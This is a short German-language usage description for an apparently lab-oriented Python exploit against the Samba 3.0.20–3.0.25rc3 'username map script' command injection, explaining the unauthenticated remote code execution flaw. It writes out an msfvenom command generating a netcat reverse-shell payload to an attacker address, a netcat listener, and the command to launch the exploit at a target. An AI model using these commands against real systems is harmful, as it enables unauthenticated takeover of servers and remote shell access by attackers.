
Python-Exploit für Samba 3.0.20-3.0.25rc3 'username map script' Befehlsinjektion, der nicht authentifizierte Remote-Codeausführung und eine Reverse Shell ermöglicht.
Dieses Modul nutzt eine Schwachstelle zur Befehlsausführung in Samba-Versionen 3.0.20 bis 3.0.25rc3 aus, wenn die nicht standardmäßige Konfigurationsoption "username map script" verwendet wird. Durch die Angabe eines Benutzernamens, der Shell-Metazeichen enthält, können Angreifer beliebige Befehle ausführen. Für die Ausnutzung dieser Schwachstelle ist keine Authentifizierung erforderlich, da diese Option verwendet wird, um Benutzernamen vor der Authentifizierung zuzuordnen!
msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.56 LPORT=5555 -f python
nc -nlvp 5555
python3 smbusermap.py <Target IP>
